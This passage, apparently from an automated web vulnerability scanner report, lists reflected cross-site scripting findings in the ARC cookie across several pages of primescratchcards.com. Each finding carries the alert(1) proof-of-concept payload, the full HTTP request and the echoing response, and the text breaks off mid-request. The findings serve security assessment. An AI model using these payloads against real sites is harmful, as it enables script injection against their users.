Set-Cookie: ARC=13013759f27%22%3Balert%281%29%2F%2Fe1dbe20273c; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=13013759f27";alert(1)//e1dbe20273c' border='0' width='1' height='1'>
...[SNIP]...

3.131. http://primescratchcards.com/images/media.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/media.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload bb723--><script>alert(1)</script>b0a1c6492cb was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/media.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137bb723--><script>alert(1)</script>b0a1c6492cb; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137bb723%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb0a1c6492cb; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137bb723--><script>alert(1)</script>b0a1c6492cb">
...[SNIP]...

3.132. http://primescratchcards.com/images/media.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/media.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 497bd'%3balert(1)//15e5732e970 was submitted in the ARC cookie. This input was echoed as 497bd';alert(1)//15e5732e970 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/media.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137497bd'%3balert(1)//15e5732e970; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137497bd%27%3Balert%281%29%2F%2F15e5732e970; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137497bd';alert(1)//15e5732e970&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.133. http://primescratchcards.com/images/playersclub.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/playersclub.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4b23'%3balert(1)//32d80ef87e5 was submitted in the ARC cookie. This input was echoed as c4b23';alert(1)//32d80ef87e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/playersclub.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137c4b23'%3balert(1)//32d80ef87e5; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137c4b23%27%3Balert%281%29%2F%2F32d80ef87e5; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137c4b23';alert(1)//32d80ef87e5&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.134. http://primescratchcards.com/images/playersclub.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/playersclub.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b793"%3balert(1)//1e0f1270bd7 was submitted in the ARC cookie. This input was echoed as 4b793";alert(1)//1e0f1270bd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/playersclub.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301374b793"%3balert(1)//1e0f1270bd7; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301374b793%22%3Balert%281%29%2F%2F1e0f1270bd7; expires=Tue, 15-May-2012 12:38:16 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301374b793";alert(1)//1e0f1270bd7' border='0' width='1' height='1'>
...[SNIP]...

3.135. http://primescratchcards.com/images/playersclub.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/playersclub.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload adf59--><script>alert(1)</script>9a13a509d6a was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/playersclub.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137adf59--><script>alert(1)</script>9a13a509d6a; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137adf59%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9a13a509d6a; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137adf59--><script>alert(1)</script>9a13a509d6a">
...[SNIP]...

3.136. http://primescratchcards.com/images/promotions.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/promotions.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 634dd--><script>alert(1)</script>f4ababbc828 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/promotions.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137634dd--><script>alert(1)</script>f4ababbc828; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137634dd%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef4ababbc828; expires=Tue, 15-May-2012 12:38:16 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137634dd--><script>alert(1)</script>f4ababbc828">
...[SNIP]...

3.137. http://primescratchcards.com/images/promotions.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/promotions.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f55e4'%3balert(1)//6af5e83356f was submitted in the ARC cookie. This input was echoed as f55e4';alert(1)//6af5e83356f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/promotions.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137f55e4'%3balert(1)//6af5e83356f; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:15 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137f55e4%27%3Balert%281%29%2F%2F6af5e83356f; expires=Tue, 15-May-2012 12:38:14 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137f55e4';alert(1)//6af5e83356f&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.138. http://primescratchcards.com/images/promotions.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/promotions.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e4a0"%3balert(1)//d5f5fbe1a5d was submitted in the ARC cookie. This input was echoed as 8e4a0";alert(1)//d5f5fbe1a5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/promotions.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301378e4a0"%3balert(1)//d5f5fbe1a5d; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301378e4a0%22%3Balert%281%29%2F%2Fd5f5fbe1a5d; expires=Tue, 15-May-2012 12:38:14 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301378e4a0";alert(1)//d5f5fbe1a5d' border='0' width='1' height='1'>
...[SNIP]...

3.139. http://primescratchcards.com/images/terms.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/terms.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 7745f--><script>alert(1)</script>d768002612a was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/terms.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301377745f--><script>alert(1)</script>d768002612a; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=1301377745f%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed768002612a; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="1301377745f--><script>alert(1)</script>d768002612a">
...[SNIP]...

3.140. http://primescratchcards.com/images/terms.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/terms.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d47"%3balert(1)//edab606af36 was submitted in the ARC cookie. This input was echoed as b7d47";alert(1)//edab606af36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/terms.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137b7d47"%3balert(1)//edab606af36; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137b7d47%22%3Balert%281%29%2F%2Fedab606af36; expires=Tue, 15-May-2012 12:38:24 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137b7d47";alert(1)//edab606af36' border='0' width='1' height='1'>
...[SNIP]...

3.141. http://primescratchcards.com/images/terms.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/terms.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 133fa'%3balert(1)//f7892ed5c0f was submitted in the ARC cookie. This input was echoed as 133fa';alert(1)//f7892ed5c0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/terms.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137133fa'%3balert(1)//f7892ed5c0f; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137133fa%27%3Balert%281%29%2F%2Ff7892ed5c0f; expires=Tue, 15-May-2012 12:38:26 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137133fa';alert(1)//f7892ed5c0f&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.142. http://primescratchcards.com/images/underage.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/underage.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload cb889--><script>alert(1)</script>7c8fb9ac580 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/underage.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137cb889--><script>alert(1)</script>7c8fb9ac580; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137cb889%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7c8fb9ac580; expires=Tue, 15-May-2012 12:38:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137cb889--><script>alert(1)</script>7c8fb9ac580">
...[SNIP]...

3.143. http://primescratchcards.com/images/underage.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/underage.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3da0'%3balert(1)//5a270d6e34e was submitted in the ARC cookie. This input was echoed as e3da0';alert(1)//5a270d6e34e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/underage.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137e3da0'%3balert(1)//5a270d6e34e; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137e3da0%27%3Balert%281%29%2F%2F5a270d6e34e; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137e3da0';alert(1)//5a270d6e34e&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.144. http://primescratchcards.com/images/underage.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/underage.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85468"%3balert(1)//e0168fa7962 was submitted in the ARC cookie. This input was echoed as 85468";alert(1)//e0168fa7962 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/underage.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
